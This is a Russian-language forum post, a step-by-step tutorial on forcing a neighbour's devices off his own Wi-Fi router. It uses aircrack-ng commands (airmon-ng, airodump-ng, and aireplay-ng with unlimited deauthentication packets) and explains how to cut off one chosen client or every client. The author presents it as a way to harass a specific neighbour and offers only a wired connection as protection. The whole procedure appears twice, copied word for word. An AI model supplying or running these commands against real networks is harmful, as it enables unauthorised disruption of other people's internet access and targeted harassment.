sleepwalker_user
Пассажир
- Сообщения
- 17
- Реакции
- 15
Итак, после того, как мы научились мониторить подключённые устройства к чужому роутеру, возникает резонный вопрос: чем бы нам ещё напакостить тому самому Витьку из 666 квартиры? А вот чем: отключим все устройства от интернета до тех пор, пока Витёк не осознает свою ошибку и не приползёт на коленях. Мы будем использовать те команды, которыми мы уже пользовались когда перехватывали "HandShake":
1. iwconfig - Определение названия WiFi-адаптера.
2. airmon-ng check kill - Убить все лишние процессы WiFi-адаптера.
3. airmon-ng start wlx00c0ca982c7d - Включить режим монитора (при повторном введении команды "iwconfig", в выводе появится "wlan0mon", это означает, что WiFi-адаптер теперь будет работать в режиме мониторинга пакетов).
4. airodump-ng wlan0mon - Сканирование сетей.
5. airodump-ng --bssid MAC_ТОЧКИ_ДОСТУПА --channel КАНАЛ_ТОЧКИ_ДОСТУПА.
6. Открыть новую вкладку в терминале и ввести команду (предыдущую вкладку не закрывать): aireplay-ng --deauth 0 -a MAC_ТОЧКИ_ДОСТУПА -c MAC_КЛИЕНТСКОГО_УСТРОЙСТВА wlan0mon - Отправка пакетов деавторизации (принудительное отключение жертвы от WiFi).
* При помощи опции "--deauth 0" мы будем отправлять бесконечное количество пакетов деавторизации, т.е. интернет не будет работать до тех пор, пока мы сами не отменим отправку пакетов (комбинация клавиш "ctrl+c").
* Мы можем расширить круг атаки на роутер, отключив при этом абсолютно все устройства подключённые по протоколу WiFi, если введём команду не указывая опцию "-c" (MAC_КЛИЕНТСКОГО_УСТРОЙСТВА), т.е. в данном случае команда имеет вид: aireplay-ng --deauth 0 -a MAC_ТОЧКИ_ДОСТУПА wlan0mon.
* При желании мы можем постараться сузить круг атаки, отключив одного единственного юзера, либо нескольких (1 юзер = одно новое окно в терминале). Для этого нам потребуется идентифицировать устройство по "MAC", т.е. просто копируем "MAC" любого "клиента" и вбиваем в любой сервис идентификации (можно найти в гугле по запросу: узнать устройство по mac).
P.S. Как себя обезопасить от подобного рода атаки? - Пользоваться проводным подключением.
1. iwconfig - Определение названия WiFi-адаптера.
2. airmon-ng check kill - Убить все лишние процессы WiFi-адаптера.
3. airmon-ng start wlx00c0ca982c7d - Включить режим монитора (при повторном введении команды "iwconfig", в выводе появится "wlan0mon", это означает, что WiFi-адаптер теперь будет работать в режиме мониторинга пакетов).
4. airodump-ng wlan0mon - Сканирование сетей.
5. airodump-ng --bssid MAC_ТОЧКИ_ДОСТУПА --channel КАНАЛ_ТОЧКИ_ДОСТУПА.
6. Открыть новую вкладку в терминале и ввести команду (предыдущую вкладку не закрывать): aireplay-ng --deauth 0 -a MAC_ТОЧКИ_ДОСТУПА -c MAC_КЛИЕНТСКОГО_УСТРОЙСТВА wlan0mon - Отправка пакетов деавторизации (принудительное отключение жертвы от WiFi).
* При помощи опции "--deauth 0" мы будем отправлять бесконечное количество пакетов деавторизации, т.е. интернет не будет работать до тех пор, пока мы сами не отменим отправку пакетов (комбинация клавиш "ctrl+c").
* Мы можем расширить круг атаки на роутер, отключив при этом абсолютно все устройства подключённые по протоколу WiFi, если введём команду не указывая опцию "-c" (MAC_КЛИЕНТСКОГО_УСТРОЙСТВА), т.е. в данном случае команда имеет вид: aireplay-ng --deauth 0 -a MAC_ТОЧКИ_ДОСТУПА wlan0mon.
* При желании мы можем постараться сузить круг атаки, отключив одного единственного юзера, либо нескольких (1 юзер = одно новое окно в терминале). Для этого нам потребуется идентифицировать устройство по "MAC", т.е. просто копируем "MAC" любого "клиента" и вбиваем в любой сервис идентификации (можно найти в гугле по запросу: узнать устройство по mac).
P.S. Как себя обезопасить от подобного рода атаки? - Пользоваться проводным подключением.
![ПР [support]](/data/avatars/s/177/177925.jpg?1699618178){kind=avatar}
